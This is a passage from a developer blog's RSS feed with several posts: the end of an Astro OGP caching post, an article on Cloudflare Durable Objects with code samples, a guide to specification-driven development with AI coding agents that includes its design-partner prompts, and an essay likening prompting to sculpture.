&lt;p&gt;With caching enabled, unchanged posts reuse their OGP images immediately. On my setup the OGP step dropped by roughly 100–300 ms per image that didn’t need regeneration, which noticeably reduced total build time as the post count grew.&lt;/p&gt;
&lt;h2&gt;Footnotes &amp;amp; pointers&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Astro endpoints are called at build time in SSG and can generate static files; they become live routes in SSR.&lt;/li&gt;
&lt;li&gt;Satori converts HTML/CSS to SVG; Resvg rasterizes SVG to PNG.&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>Rethinking State: My Experience with Cloudflare&apos;s Durable Objects</title><link>https://ainoya.dev/posts/durable-object/</link><guid isPermaLink="true">https://ainoya.dev/posts/durable-object/</guid><description>Exploring Cloudflare Durable Objects as a paradigm shift in stateful edge computing. From Redis Streams to zero-latency SQLite integration, discover how this technology revolutionizes real-time application architecture with globally unique instances and the Actor Model.</description><pubDate>Sun, 03 Aug 2025 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;I recently found myself architecting a seamless experience for an AI chat application. The goal was simple: if a user&apos;s connection drops during a streaming response, they should be able to reconnect and pick up right where they left off.&lt;/p&gt;
&lt;p&gt;My initial thought was a conventional setup using Redis Streams. It&apos;s a solid, well-understood pattern for handling streaming data and reconnections. However, during my research, I stumbled upon a technology that promised to solve the same problem with a radically different approach: &lt;strong&gt;Cloudflare Durable Objects&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;The more I delved into it, the clearer it became that this wasn&apos;t just an alternative solution. It was a groundbreaking architecture that challenges the fundamental assumptions we hold about distributed systems, a sentiment echoed in &lt;a href=&quot;https://blog.cloudflare.com/introducing-workers-durable-objects/&quot;&gt;Cloudflare&apos;s introductory blog post&lt;/a&gt;. This article chronicles that journey of discovery, from initial skepticism to a full-blown paradigm shift in how I think about building stateful applications.&lt;/p&gt;
&lt;h3&gt;TL;DR&lt;/h3&gt;
&lt;p&gt;Cloudflare Durable Objects are not just another feature; they represent a paradigm shift in how we build stateful applications. By providing strong consistency at the edge, zero-latency SQL, and automatic geographic distribution, they dismantle constraints that have defined distributed systems for decades.&lt;/p&gt;
&lt;h3&gt;A New Foundation: Breaking Through Old Limits&lt;/h3&gt;
&lt;p&gt;Traditional serverless architectures, for all their benefits, are built on a core limitation: they are stateless. This design choice offloads state management to external databases, introducing network latency and geographical constraints.&lt;/p&gt;
&lt;p&gt;Durable Objects, however, are inherently stateful. The revolutionary idea behind them is the concept of a &lt;strong&gt;&quot;globally unique instance,&quot;&lt;/strong&gt; as detailed in the &lt;a href=&quot;https://developers.cloudflare.com/durable-objects/&quot;&gt;official documentation&lt;/a&gt;. A Durable Object with a specific ID is guaranteed to exist only once in the entire world. Any client, from anywhere, can access that single, unique instance.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// A globally unique counter
let id = COUNTER_NAMESPACE.idFromName(&quot;global-counter&quot;);
let counter = COUNTER_NAMESPACE.get(id);
let response = await counter.fetch(request);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This simple primitive unlocks a completely new way of building applications by co-locating state and the code that operates on it.&lt;/p&gt;
&lt;h3&gt;Architectural Showdown: Redis vs. Durable Objects&lt;/h3&gt;
&lt;p&gt;Let&apos;s compare the two approaches for our chat application.&lt;/p&gt;
&lt;h4&gt;The Traditional Redis Stream Approach&lt;/h4&gt;
&lt;p&gt;This architecture involves multiple WebSocket servers, a load balancer, and a Redis cluster for state management.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;graph TD
    subgraph &quot;Conventional Architecture&quot;
        A[Load Balancer] --&amp;gt; B[WebSocket Server 1]
        A --&amp;gt; C[WebSocket Server 2]
        A --&amp;gt; D[WebSocket Server N]
        B --&amp;gt; E[Redis Stream]
        C --&amp;gt; E
        D --&amp;gt; E
        E --&amp;gt; F[Persistence Layer]
    end

    G[Client] --&amp;gt; A
    H[Problem: State synchronization]
    I[Problem: Complex failure handling]
    J[Problem: Scaling complexity]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The challenges are numerous: synchronizing state across servers, the operational overhead of managing Redis, and complex recovery logic.&lt;/p&gt;
&lt;h4&gt;The Durable Objects Approach&lt;/h4&gt;
&lt;p&gt;With Durable Objects, the architecture is radically simplified. Each chat session becomes a Durable Object, encapsulating all its state and logic.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;graph TD
    subgraph &quot;Durable Objects Architecture&quot;
        A[Global Edge] --&amp;gt; B[Chat Session DO]
        B --&amp;gt; C[Local SQLite]
        B --&amp;gt; D[WebSocket Connections]
        D --&amp;gt; E[Client 1]
        D --&amp;gt; F[Client 2]
    end

    H[Automatic Geo-Distribution]
    I[Code and State Colocation]
    J[Zero-Latency Access]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This eliminates external middleware and allows the system to benefit from Cloudflare&apos;s global network for automatic geographic distribution. The difference in implementation is stark, moving from complex, multi-system coordination to a self-contained, elegant object.&lt;/p&gt;
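&lt;p&gt;A condensed sketch of such an object, assuming the WebSocket hibernation API and an illustrative &lt;code&gt;messages&lt;/code&gt; table, might look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Illustrative only: one instance per chat room, owning its sockets and history.
export class ChatSession extends DurableObject {
  async fetch(request) {
    const pair = new WebSocketPair();
    this.ctx.acceptWebSocket(pair[1]); // hibernation-friendly accept
    return new Response(null, { status: 101, webSocket: pair[0] });
  }

  webSocketMessage(ws, message) {
    // Persist locally, then fan out to every peer in this room.
    this.ctx.storage.sql.exec(&quot;INSERT INTO messages (body) VALUES (?)&quot;, message);
    for (const peer of this.ctx.getWebSockets()) peer.send(message);
  }
}
&lt;/code&gt;&lt;/pre&gt;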
&lt;h3&gt;The Revolution: Zero-Latency SQLite Integration&lt;/h3&gt;
&lt;p&gt;This is where Durable Objects truly defy conventional wisdom. They offer &lt;strong&gt;synchronous SQL execution&lt;/strong&gt; directly within the object, a feature Cloudflare detailed in their post, &quot;&lt;a href=&quot;https://blog.cloudflare.com/sqlite-in-durable-objects/&quot;&gt;Zero-latency SQLite storage in every Durable Object&lt;/a&gt;.&quot;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// No await needed for reads!
let cursor = sql.exec(&quot;SELECT name, email FROM users&quot;);
for (let user of cursor) {
  console.log(user.name, user.email);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is possible because SQLite runs as a library in the same thread as your code, with data aggressively cached in memory and stored on a local SSD. To keep synchronous writes fast without sacrificing durability, Cloudflare introduced &lt;strong&gt;Output Gates&lt;/strong&gt;: writes return to your code immediately, but any outgoing response is held until the data has been durably stored, ensuring both performance and consistency.&lt;/p&gt;
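&lt;p&gt;In practice this means even writes look synchronous to your code. The sketch below (table name assumed) relies on the output gate rather than an explicit &lt;code&gt;await&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Writes also return immediately; the runtime holds the outgoing
// response until durability is confirmed.
sql.exec(&quot;UPDATE counters SET value = value + 1 WHERE name = ?&quot;, &quot;hits&quot;);
return new Response(&quot;ok&quot;); // released only once the write is durable
&lt;/code&gt;&lt;/pre&gt;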
&lt;h3&gt;Solving the N+1 Query Problem for Good&lt;/h3&gt;
&lt;p&gt;This zero-latency access effectively eliminates the &quot;N+1 query problem&quot; at its root. In a traditional architecture, 101 queries over a network with 5ms latency would take over half a second. Inside a Durable Object, the same 101 queries are function calls that complete in a few milliseconds.&lt;/p&gt;
&lt;p&gt;This isn&apos;t just an optimization; it&apos;s a fundamental change in the performance model. It liberates developers from &quot;N+1 query phobia&quot; and allows them to write simple, clear, and maintainable code without sacrificing performance. The pressure to collapse queries into complex &lt;code&gt;JOIN&lt;/code&gt; statements purely to save round trips, often a source of technical debt, simply evaporates.&lt;/p&gt;
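&lt;p&gt;As a hypothetical illustration (table and column names invented), the classic 1+N pattern becomes harmless when every query is an in-process call:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;let posts = this.ctx.storage.sql.exec(&quot;SELECT id, title FROM posts&quot;).toArray();
for (let post of posts) {
  // One extra query per row: a local function call, not a network round trip.
  post.comments = this.ctx.storage.sql
    .exec(&quot;SELECT body FROM comments WHERE post_id = ?&quot;, post.id)
    .toArray();
}
&lt;/code&gt;&lt;/pre&gt;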
&lt;h3&gt;Why Is This Technology So Unique?&lt;/h3&gt;
&lt;p&gt;A striking fact is that &lt;strong&gt;no other major cloud provider offers anything quite like Durable Objects.&lt;/strong&gt; While services like AWS Lambda or Google Cloud Functions are powerful, they remain fundamentally stateless at the edge. The tight integration of stateful compute, persistent storage, and a global network is, for now, unique to Cloudflare. This uniqueness stems from Cloudflare&apos;s ability to leverage its massive, pre-existing global network of over 300 data centers to build a truly distributed platform.&lt;/p&gt;
&lt;h3&gt;A New Mindset: Designing with Actors&lt;/h3&gt;
&lt;p&gt;To leverage Durable Objects effectively, we must shift our thinking from the traditional request/response model to the &lt;strong&gt;Actor Model&lt;/strong&gt;. At its core, the Actor Model treats &quot;actors&quot; as the fundamental units of computation. Each actor is an independent entity with its own state and logic, communicating with others exclusively through asynchronous messages. This approach is a natural fit for Durable Objects and requires avoiding common pitfalls.&lt;/p&gt;
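&lt;p&gt;In Durable Objects terms, &quot;sending a message to an actor&quot; is simply calling a method on a stub. The sketch below assumes a hypothetical &lt;code&gt;postMessage&lt;/code&gt; RPC method and a &lt;code&gt;CHAT_NAMESPACE&lt;/code&gt; binding:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Callers never touch the actor&apos;s state directly; they send it a message.
const stub = CHAT_NAMESPACE.get(CHAT_NAMESPACE.idFromName(&quot;room-42&quot;));
await stub.postMessage({ from: &quot;alice&quot;, body: &quot;hi&quot; }); // hypothetical RPC method
&lt;/code&gt;&lt;/pre&gt;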
&lt;h4&gt;Anti-Pattern 1: The Monolithic &quot;God&quot; Object&lt;/h4&gt;
&lt;p&gt;Avoid creating a single DO to manage state for all users. This creates a massive bottleneck, as all requests are serialized through a single thread, a limitation outlined in the &lt;a href=&quot;https://developers.cloudflare.com/durable-objects/platform/limits/&quot;&gt;platform limits documentation&lt;/a&gt;. The correct approach is to assign one DO per logical entity, such as a chat room or a user session.&lt;/p&gt;
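&lt;p&gt;The fix is usually one line at the call site: derive the ID from the entity rather than from a global constant (the binding and naming scheme here are illustrative):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// ❌ BAD: every request funnels through one instance
let globalId = CHAT_NAMESPACE.idFromName(&quot;global&quot;);

// ✅ GOOD: one instance per chat room, scaling out by entity
let roomId = CHAT_NAMESPACE.idFromName(&quot;room:&quot; + roomName);
&lt;/code&gt;&lt;/pre&gt;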
&lt;h4&gt;Anti-Pattern 2: Synchronous External API Calls&lt;/h4&gt;
&lt;p&gt;Making a long-running external API call inside a DO will block all other requests to that object. Instead, long-running tasks should be offloaded to background processes using the &lt;a href=&quot;https://developers.cloudflare.com/durable-objects/api-reference/durable-object-alarms/&quot;&gt;Alarms API&lt;/a&gt;. This ensures the object remains responsive.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// ❌ BAD: Blocking on a slow external API
export class Order extends DurableObject {
  async processPayment() {
    // This call could take seconds, blocking all other operations
    const result = await fetch(&apos;https://slow-payment-api.com/charge&apos;);
    return result.json();
  }
}

// ✅ GOOD: Use Alarms for non-blocking operations
export class Order extends DurableObject {
  async schedulePaymentProcessing() {
    // Immediately respond to the client
    // Schedule the long-running task to be executed later
    await this.ctx.storage.setAlarm(Date.now() + 1000);
    return new Response(JSON.stringify({ status: &apos;processing&apos; }), { status: 202 });
  }

  async alarm() {
    // The alarm runs in the background without blocking new requests
    await fetch(&apos;https://slow-payment-api.com/charge&apos;);
    // ...update state after the API call completes
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;Cloudflare&apos;s Durable Objects are more than just a clever piece of engineering. They represent a fundamental shift in how we can and should build applications for the web.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;A Paradigm Shift:&lt;/strong&gt; They bring stateful computing back to the edge, challenging the &quot;stateless-first&quot; orthodoxy.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;A Technical Breakthrough:&lt;/strong&gt; Zero-latency SQL access inside a serverless function fundamentally changes performance calculations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;A Superior Developer Experience:&lt;/strong&gt; They drastically simplify the architecture for complex features like real-time collaboration, as demonstrated in tutorials like the &lt;a href=&quot;https://developers.cloudflare.com/durable-objects/tutorials/build-a-chat-application/&quot;&gt;chat application example&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Proven Reliability:&lt;/strong&gt; Cloudflare uses Durable Objects to power its own critical services, offering features like 30-day point-in-time recovery as a byproduct of its robust design.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In exploring a solution for a simple chat application, I found a technology that offers a glimpse into the future of distributed application architecture. It&apos;s a future that is simpler, faster, and more powerful.&lt;/p&gt;
</content:encoded></item><item><title>Beyond &quot;Just Code It&quot;: Adapting Specification-Driven Principles for AI Agents</title><link>https://ainoya.dev/posts/spec-driven-ai-coding/</link><guid isPermaLink="true">https://ainoya.dev/posts/spec-driven-ai-coding/</guid><description>Learn how to transform AI agents from chaotic coders into design partners using Specification-Driven Development principles for more structured collaboration.</description><pubDate>Sat, 02 Aug 2025 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;The era of AI-powered software development is firmly upon us. Tools like GitHub Copilot and emerging AI agents have shifted from novelties to my daily drivers. But this shift has introduced a new challenge: the &quot;wall of text&quot; review. If you&apos;ve ever felt overwhelmed by an AI agent going rogue and generating unmanageable code, or if you&apos;re a solo developer using tools like Cursor and seeking a more structured way to collaborate with your AI partner, this article is for you.&lt;/p&gt;
&lt;p&gt;I&apos;ve been there. You give an AI agent a task and return to find hundreds of lines of new code waiting for review. That overwhelm isn&apos;t just a feeling; it&apos;s a measurable drain on productivity. &lt;a href=&quot;https://devops.com/survey-ai-tools-are-increasing-amount-of-bad-code-needing-to-be-fixed/&quot;&gt;A survey featured on DevOps.com&lt;/a&gt;, for instance, found that 67% of developers reported spending more time debugging AI-generated code.&lt;/p&gt;
&lt;p&gt;To address this, I turned to a proven software engineering practice: &lt;strong&gt;Specification-Driven Development (SDD)&lt;/strong&gt;. This approach, championed by modern development tools like &lt;a href=&quot;https://kiro.dev/&quot;&gt;Kiro&lt;/a&gt;, emphasizes defining a clear specification before writing code. I decided to adapt this philosophy for my collaboration with AI agents, transforming the AI from a mere &quot;coder&quot; into a &quot;design partner.&quot;&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;The Workflow: Applying SDD to AI Collaboration&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;My process applies the core principles of SDD to my interactions with AI. It starts with a structured dialogue to ensure alignment before any code is written, turning a free-form instruction into a well-defined plan.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Phase 1: The Guardrail Prompt&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Autonomous AI agents tend to rush into coding. To counter this, I don&apos;t just ask the AI to &quot;implement a feature.&quot; I use a &quot;guardrail prompt&quot; that instructs it to act as my design partner and first ask clarifying questions. This initial dialogue, a cornerstone of good design practice, forces the AI to pause and think, creating a shared understanding of the requirements upfront.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Here is a practical &quot;guardrail prompt&quot; I use to start the conversation:

You are an expert software design partner. Before generating any code, your primary goal is to understand the requirements deeply.

Based on the feature request below, you must first ask me clarifying questions to understand:
1. **Why**: The business goal or the problem this feature solves.
2. **Who**: The end-users (e.g., general user, admin) and their needs.
3. **What**: The primary use cases.
4. **Constraints**: Any technical limitations or required libraries/frameworks.
5. **Non-functional requirements**: Specific concerns about security, performance, etc.

Do not write any design documentation or code until I have answered these questions.

My feature request is: [Your feature idea here]
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;&lt;strong&gt;Phase 2: The Structured Specification for Reliable AI Implementation&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Based on the dialogue, the AI generates a formal design document in Markdown. This document becomes the foundation that enables AI agents to implement features accurately and systematically, following the SDD principle of establishing a Single Source of Truth.&lt;/p&gt;
&lt;p&gt;The document contains specific elements that AI agents need for reliable implementation:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Use cases (Given/When/Then).&lt;/li&gt;
&lt;li&gt;A domain model (Mermaid.js diagram).&lt;/li&gt;
&lt;li&gt;API specifications (OpenAPI).&lt;/li&gt;
&lt;li&gt;Sequence diagrams.&lt;/li&gt;
&lt;li&gt;Database schema definitions (DDL).&lt;/li&gt;
&lt;li&gt;A revision history for tracking changes.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This structured approach ensures that AI agents have all the context they need to implement features without guesswork. When requirements evolve, I update the document with clear versioning to maintain implementation accuracy across iterations.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Phase 3: Detecting Complexity as a Signal&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;A valuable lesson from this process is to treat the AI&apos;s questions as a &quot;complexity sensor.&quot; If I, the human developer, find it difficult to answer the AI&apos;s questions, it&apos;s a strong signal that the feature itself is too complex or ill-defined.&lt;/p&gt;
&lt;p&gt;This friction tells me it&apos;s time to simplify. I split the feature into smaller, more manageable pieces and restart the specification process for each. This feedback loop helps me adhere to the principle of &quot;divide and conquer.&quot;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Phase 4: Generating Actionable Tasks from the Specification&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Once I approve the design document, I instruct the AI: &quot;Based on this confirmed specification, generate a list of implementation tasks.&quot;&lt;/p&gt;
&lt;p&gt;The AI then analyzes the entire document and produces a checklist of discrete, ordered tasks, perfectly suited for AI coding tools:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;* [ ] Task 1: Generate TypeScript type definitions from the OpenAPI schema.
* [ ] Task 2: Create a database migration file based on the DDL.
* [ ] Task 3: Implement the POST /users endpoint handler and routing.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Because each task is small, specific, and derived from a mutually agreed-upon plan, the AI&apos;s success rate is significantly higher.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Why This Adaptation of SDD Works&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Applying these specification-driven principles to my AI workflow has yielded clear benefits:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;It drastically reduces the cognitive load of reviews.&lt;/strong&gt; I can focus on the design, not on deciphering a mountain of code.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;It keeps the human in the driver&apos;s seat.&lt;/strong&gt; The process ensures my development aligns with strategic goals.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;It minimizes rework.&lt;/strong&gt; Catching misunderstandings at the design phase is far more efficient. Research attributed to IBM&apos;s Systems Sciences Institute is often cited for the finding that fixing a bug after release can cost up to 100 times more than fixing it during design. My approach is a practical application of this wisdom in the AI era.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Conclusion: A More Sustainable Way to Collaborate with AI&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;This methodology isn&apos;t a new invention, but rather my deliberate adaptation of a robust engineering principle to the unique challenges of AI collaboration. It establishes a clear division of labor: I define the &quot;what&quot; and &quot;why,&quot; while the AI executes the &quot;how.&quot;&lt;/p&gt;
&lt;p&gt;By re-emphasizing the importance of the specification, I can harness the power of AI agents without abdicating my role as an architect. I trade the chaos of the &quot;wall of text&quot; for the clarity of a structured dialogue, leading to a more controlled, predictable, and ultimately faster development lifecycle.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Appendix: A Real-World Prompt for Specification-Driven AI Collaboration&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;To make this workflow even more concrete, here is the comprehensive prompt I use with AI agents like Cursor. It encapsulates all the steps discussed, from the initial dialogue to generating the final task list. This prompt turns the AI into a dedicated design partner that follows the SDD process rigorously.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Rules for Specification-Driven Development with an AI Agent

## Role

You are an **expert design partner specializing in Specification-Driven Development (SDD)**. Inspired by tools like Kiro, your primary mission is to define a &quot;specification&quot; first and then derive all documents and code from it. This ensures a consistent and efficient development process with minimal rework.

Your main task is to respond to a feature development request by **identifying missing requirements through dialogue** with the user, building consensus, and accurately generating the following deliverable:

1. **Design Document (docs/[feature-name].md)**: This document defines the &quot;Why&quot; and &quot;What&quot; of the feature and includes the API specification. It serves as the **Single Source of Truth**.

## Execution Process

When you receive an instruction like &quot;Design the [feature-name] feature,&quot; you must strictly follow these steps.

### Step 0: The Clarification Dialogue

After receiving the initial instruction, do not start generating the document immediately. First, ask the user clarifying questions to improve the resolution of the design and identify potential oversights.

**&amp;lt;Your Action&amp;gt;**

1. Identify the feature name from the user&apos;s instruction.
2. Based on the &quot;Design Requirements Checklist&quot; below, generate questions about any unclear points and ask the user for answers.

&amp;gt; **Example AI Response:**
&amp;gt; &quot;Understood. I will begin designing the &apos;[feature-name]&apos; feature.
&amp;gt; To ensure the design is accurate, please allow me to ask a few questions:
&amp;gt;
&amp;gt; **[Design Requirements Checklist]**
&amp;gt; - **Background/Goal (Why):** What specific problem or business objective does this feature address?
&amp;gt; - **Users (Who):** What kind of users will use this feature (e.g., general users, administrators)?
&amp;gt; - **Primary Use Cases (What):** Could you describe the most important and representative user scenarios?
&amp;gt; - **Technical Constraints:** Are there any technical constraints or required libraries/services?
&amp;gt; - **Non-functional Requirements:** Are there any special considerations for security, performance, or future scalability?
&amp;gt;
&amp;gt; Could you please provide information on these points to the best of your ability?&quot;

### Step 1: Initialize Project Structure

Generate a file structure based on the feature name. For example, for &quot;User Authentication,&quot; create `docs/user-authentication.md`.

### Step 2: Generate the Design Document

Based on the information gathered in Step 0, generate a draft of the design document using the template below.

---

# [Feature Name] Design Document

&amp;gt; **Purpose**: This document aims to create a shared understanding by defining the feature&apos;s background, use cases, domain model, and technical API specifications. This document is the Single Source of Truth.

**Revision History**

| Date       | Version | Author | Summary of Changes   |
| :--------- | :------ | :----- | :------------------- |
| YYYY-MM-DD | 1.0.0   | AI     | Initial draft creation |

**Table of Contents**

- [1. Introduction](#1-introduction)
- [2. Use Cases](#2-use-cases)
- [3. Domain Model](#3-domain-model)
- [4. API and Implementation Design](#4-api-and-implementation-design)
- [5. Considerations](#5-considerations)

---

## 1. Introduction

(Describe the feature&apos;s background, purpose, and scope based on the Step 0 dialogue.)

## 2. Use Cases

#### UC-001: [Use Case Name]

**Actor**: (The user or system performing the action)
**Trigger**: (The event that initiates this use case)

**Given**:
- (Preconditions that must be true before the use case starts)

**When/Then**:
1. **When**: (The user performs an action)
2. **Then**: (The system responds or changes state)

**Postconditions (on success)**:
- (The state of the system after the flow is successfully completed)

## 3. Domain Model

```mermaid
classDiagram
  class EntityA {
    -id: string
    +action()
  }
  class EntityB {
    -id: string
  }
  EntityA &quot;1&quot; -- &quot;0..*&quot; EntityB
```

## 4. API and Implementation Design

### 4.1. API Specification (OpenAPI)

```yaml
openapi: 3.0.3
info:
  title: &quot;[Feature Name] API&quot;
  version: &quot;1.0.0&quot;
paths:
  /example-endpoint:
    get:
      summary: &quot;Example GET endpoint&quot;
      operationId: &quot;getExample&quot;
      responses:
        &apos;200&apos;:
          description: &quot;Successful response&quot;
```

### 4.2. Sequence Diagram

```mermaid
sequenceDiagram
  participant User
  participant Frontend
  participant Backend
  User-&amp;gt;&amp;gt;Frontend: Request
  Frontend-&amp;gt;&amp;gt;Backend: API Call
  Backend--&amp;gt;&amp;gt;Frontend: Response
  Frontend--&amp;gt;&amp;gt;User: Display
```

### 4.3. Database Design (Schema)

Note on Cloudflare D1 Usage:
This project uses Cloudflare D1, which does not support complex transactions.

* Avoid multi-table updates where possible.
* If necessary, ensure idempotency at the application level.
* Add indexes to columns used in search conditions for performance.

**[table_name] Table**

| Column | Type | Constraints | Description |
| :---- | :---- | :---- | :---- |
| id | TEXT | PRIMARY KEY | Unique ID |
| created_at | TEXT | NOT NULL | Creation timestamp |

```sql
CREATE TABLE [table_name] (
    id TEXT PRIMARY KEY,
    created_at TEXT NOT NULL DEFAULT (datetime(&apos;now&apos;, &apos;utc&apos;))
);
```

## 5. Considerations

(Note any non-functional requirements, security, performance, or scalability concerns.)

## 6. Recommended Implementation Tasks

(This section will be filled in after the design is finalized.)

### Step 3: Request for Review

Once the draft is generated, ask the human for a review and guide them on how to provide feedback.

### Step 4: Update and Show Diffs

When the user provides feedback, update the document, increment the version number in the revision history, and clearly state what was changed. Repeat until the user confirms the design is final.

### Step 5: Generate the Implementation Task List

Once the user confirms &quot;The design is final,&quot; analyze the entire document and generate a checklist of actionable, ordered implementation tasks in section 6.

Example AI Response:
&quot;Thank you for confirming the design. I have added a 6. Recommended Implementation Tasks section to the design document.
Please copy and paste each task, one by one, to instruct me on implementation. Let&apos;s start with the first task.&quot;

&lt;/code&gt;&lt;/pre&gt;
</content:encoded></item><item><title>Marble to LLM</title><link>https://ainoya.dev/posts/marble-to-llm/</link><guid isPermaLink="true">https://ainoya.dev/posts/marble-to-llm/</guid><description>Generative AI mirrors sculpture—from Michelangelo’s marble to Japanese natabori—helping engineers reveal hidden forms within LLMs.</description><pubDate>Tue, 29 Apr 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;From Marble to Model: The AI Sculpting Process&lt;/h2&gt;
&lt;p&gt;Creating something with generative AI often feels a lot like carving a Buddha statue out of a block of wood. Long before “AI” even existed, artists used similar metaphors to describe the act of revealing something precious that already lies hidden within raw material. Today, as engineers and creators, we’re doing much the same thing—only our chisel has become a prompt, and our marble is a massive neural network.&lt;/p&gt;
&lt;h2&gt;The Sculpture Analogy in Western Art&lt;/h2&gt;
&lt;p&gt;One of the most famous stories in Western art comes from Michelangelo. He claimed that the figure he sculpted from a slab of marble was already present inside the rock; his job was simply to remove the excess stone until the statue emerged. This idea—that every block of marble contains a masterpiece waiting to be freed—captures the essence of generative creation. We don’t “make” the knowledge; we uncover it.&lt;/p&gt;
&lt;h2&gt;Wisdom of Japanese Buddhist Sculptors&lt;/h2&gt;
&lt;p&gt;A parallel tradition exists in Japan. During the Edo period, master sculptors like &lt;strong&gt;Enkū&lt;/strong&gt; and &lt;strong&gt;Mokujiki&lt;/strong&gt; practiced &lt;em&gt;natabori&lt;/em&gt; (鉈彫り), a technique of boldly and swiftly carving wooden statues with a single-edged axe. Legend says these artists believed the Buddha already resided within the tree, and their role was to listen to the wood’s voice and reveal its hidden form. This resonates deeply with the “craftsman’s heart”—a focus on intuition, dialogue with material, and unearthing its essential nature.&lt;/p&gt;
&lt;h2&gt;Generative AI as a Modern Chisel&lt;/h2&gt;
&lt;p&gt;For engineers today, coding often means writing lines of text in an IDE. Increasingly, it means guiding a large language model (LLM) to produce those lines for us. In the same way that Michelangelo saw form in marble and Enkū heard Buddha in wood, we see algorithms, functions, and architectures within the vast “weights” of an LLM. Our prompts become chisels, our responses the statues we coax into being.&lt;/p&gt;
&lt;p&gt;Blog writing follows the same pattern: instead of staring at a blank page, we write a prompt; the AI drafts an outline or a paragraph; we polish, refine, and—like any good sculptor—remove what’s unnecessary until the idea stands clear.&lt;/p&gt;
&lt;h2&gt;Finding Your Voice in LLMs&lt;/h2&gt;
&lt;p&gt;The remarkable thing about a block of marble or a chunk of wood is that every piece is unique. Likewise, every engineer’s interaction with an LLM produces a different result. The knowledge embedded in the model is vast, but what emerges depends entirely on your creativity and intent.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Choice of Prompt&lt;/strong&gt;: Just as an axe blow determines the grain you remove, the words you choose shape the AI’s output.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Iterative Refinement&lt;/strong&gt;: Sculptors make many passes; you’ll refine your draft through feedback loops and edits.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Personal Style&lt;/strong&gt;: Enkū’s statues have a rough-hewn immediacy, Michelangelo’s a polished grandeur—your code and writing should reflect your own sensibility.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Accelerating Creative Endeavors&lt;/h2&gt;
&lt;p&gt;By embracing generative AI as our modern tool, we gain the ability to accelerate every stage of creation: ideation, drafting, testing, and deployment. What once might have taken days of boilerplate coding or writer’s block can now be reduced to hours of prompt engineering and iterative polishing.&lt;/p&gt;
&lt;p&gt;Yet the core principle remains unchanged: the masterpiece was always there, waiting to be revealed. Our role is to listen carefully—to the wood, the marble, or the deep neural network—identify the hidden form, and bring it to light.&lt;/p&gt;
&lt;h2&gt;Carrying the Chisel Forward: Next Steps in AI Creation&lt;/h2&gt;
&lt;p&gt;Whether you’re carving wood, sculpting marble, or sculpting text with AI, the process is fundamentally the same: uncover what’s already there. As engineers, we’re privileged to stand on the shoulders of centuries of artistic insight and apply those lessons to code and prose. With each prompt we craft, we sharpen our chisel—and with each iteration, we move one step closer to unveiling the true beauty that lies within.&lt;/p&gt;
&lt;p&gt;Let’s continue harnessing generative AI not as a black-box magician, but as a mindful craftsman—listening, refining, and revealing the creative spark hidden within.&lt;/p&gt;
